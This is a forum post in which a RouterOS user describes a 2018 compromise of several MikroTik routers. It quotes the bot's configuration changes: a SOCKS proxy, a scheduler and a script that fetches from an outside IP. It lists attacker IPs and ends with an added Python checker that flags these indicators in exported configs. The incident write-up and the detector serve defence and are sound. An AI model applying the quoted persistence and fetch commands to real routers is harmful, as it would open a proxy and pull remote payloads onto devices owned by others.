Hello,
I’ve been using RouterOS 6.35. I noticed someone logged into my router on 26th July 2018 and made some changes. On subsequent days, I found my other MikroTik routers were being hacked one by one in exactly the same way. Then I found my home MikroTik was hacked as well. When my first router was hacked, I changed passwords on the other routers. After the second router was hacked, I even replaced the username “admin” on the other routers, and I turned the ssh, api and http services off. But to my added surprise I found other routers were hacked even after those preventive measures. Then I upgraded all routers to RouterOS 6.41.3.
I compared the .rsc backup file’s text before and after the hacking took place. I found the bot made only the following changes to the configuration, after disabling all the “drop” rules in the firewall:
/ip socks
set enabled=yes port=4145
/system scheduler
add interval=30s name=schedule3_ on-event=script3_ policy=\
    ftp,reboot,read,write,policy,test,password,sensitive start-time=startup
/system script
add name=script3_ owner=admin policy=\
    ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch a\
    ddress=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http"
Here’s a list of IPs from where the hacking attempt took place:
95.154.216.151
38.75.137.158
193.70.6.197
103.207.37.69
94.23.145.124
*there were some more IPs that I didn’t copy.
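Added example, not from the poster or from MikroTik: a Python check that reads an .rsc export, joins the backslash-wrapped lines the way the export format uses them, and flags the four changes described in the post (a disabled drop rule, SOCKS enabled, a scheduler firing a script, and a script running /tool fetch against an outside host). The sample export, its 203.0.113.10 fetch address and the function names are constructed for this example.

```python
import re

# Constructed sample in the style of the .rsc diff above (not the poster's file); TEST-NET address.
SAMPLE_EXPORT = r"""/ip firewall filter
add action=drop chain=input disabled=yes in-interface=ether1
/ip socks
set enabled=yes port=4145
/system scheduler
add interval=30s name=schedule3_ on-event=script3_ policy=\
    ftp,reboot,read,write,policy,test,password,sensitive start-time=startup
/system script
add name=script3_ owner=admin policy=\
    ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch a\
    ddress=203.0.113.10 port=2008 src-path=/mikrotik.php mode=http"
"""

def join_continuations(text):
    # RouterOS wraps long commands with a trailing backslash and indents the remainder.
    commands, buf = [], ""
    for raw in text.splitlines():
        line = raw.strip() if buf else raw.rstrip()
        if line.endswith("\\"):
            buf += line[:-1]
        else:
            commands.append(buf + line)
            buf = ""
    return commands

def find_indicators(text):
    # Walks the export and flags the changes the post describes, in export order.
    section, findings = None, []
    for cmd in join_continuations(text):
        cmd = cmd.strip()
        if cmd.startswith("/"):
            section = cmd            # a bare menu path opens a new section
        elif section == "/ip firewall filter" and "action=drop" in cmd and "disabled=yes" in cmd:
            findings.append("drop rule disabled: " + cmd)
        elif section == "/ip socks" and re.search(r"\benabled=yes\b", cmd):
            findings.append("socks proxy enabled")
        elif section == "/system scheduler" and (m := re.search(r"on-event=(\S+)", cmd)):
            findings.append("scheduler runs script " + m.group(1))
        elif section == "/system script" and "/tool fetch" in cmd:
            m = re.search(r"address=([\w.:-]+)", cmd)
            findings.append("script fetches from " + (m.group(1) if m else "unknown host"))
    return findings
```

Run it against `/export` output taken from a router and compare the findings with a known-good export; an empty list means none of the four indicators is present.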